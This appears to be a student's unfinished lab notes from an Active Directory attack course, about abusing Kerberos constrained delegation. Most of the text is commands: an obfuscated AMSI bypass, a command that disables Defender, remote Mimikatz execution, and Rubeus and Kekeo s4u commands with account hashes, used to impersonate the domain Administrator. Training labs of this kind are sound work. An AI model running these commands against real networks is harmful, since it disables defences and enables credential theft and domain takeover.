We are going to start bu enumerating users with constrained delegation ->
Copy S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
. C:\AD\Tools\PowerView.ps1
Get-DomainUser -TrustedToAuth
We can either use Kekeo or Rubeus to abuse that.
Let's start with rubeus -> First we need to encode "s4u" with Argsplit
Since i'm not very meticulous, i didn't note websvc's secrets so i need to do it again ->
Copy PS C:\AD\Tools> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> . .\PowerUp.ps1
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
PS C:\AD\Tools> Enter-PSSession dcorp-adminsrv
[dcorp-adminsrv]: PS C:\Users\student613\Documents> Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
[dcorp-adminsrv]: PS C:\Users\student613\Documents> cd 'C:\Program Files\'
[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimiEx.ps1
Now let's launch the Rubeus with s4u encoded:
Copy C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
in the course there's an error on the server name that is dcorpmssql and not dcorp-mssql
And now we can access dcorp-mssql:
Now we're going to abuse Constrained Delegation using websvc with Kekeo
Let's use the tgt::ask module from kekeo to request a TGT from websvc. Note that we are using NTLM hash of websvcs here just to show NTLM hash can be used too:
Copy cd .\kekeo\x64
.\kekeo.exe
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
Now, let's use this TGT and request a TGS. Note that we are requesting a TGS to access cifs/dcorp-mssql as the domain administrator - Administrator ->
Copy tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
Now we can inject the ticket in current session to use it
(will finish kekeo later)
Now we're going to abuse Constrained Delegation using dcorp-adminsrv with Rubeus
We have the AES keys of dcorp-adminsrv$ from dcorp-adminsrv machine
Last updated 3 months ago